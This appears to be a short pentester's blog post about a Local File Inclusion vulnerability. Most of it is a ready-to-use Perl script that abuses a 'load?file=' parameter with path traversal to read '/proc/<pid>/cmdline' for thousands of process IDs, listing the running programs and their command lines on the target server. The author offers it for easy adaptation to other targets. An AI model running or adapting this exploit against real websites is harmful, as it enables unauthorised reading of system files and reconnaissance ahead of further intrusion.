This week during a pentest I discovered a website vulnerable to Local File Inclusion vulnerability. As I wanted to discover the most information possible about the system I decided to retrieve the running process and the command line used to execute these programs. With this I pretended to discover more services and paths in the system.
I wrote a very simple Perl program that can be modified very easily to other scenarios :)
Enjoy!#!/usr/bin/perl -w use LWP; my $browser = LWP::UserAgent->new; my $url = 'https://URL/load?file=../../proc/'; for($i = 0; $i < 9500; $i++){ my $response = $browser->get( $url.$i."/cmdline" ); if($response->content !~ m/^$/i) { print $i . " : " . $response->content ."\n"; } }
Posts
0 comments:
Post a Comment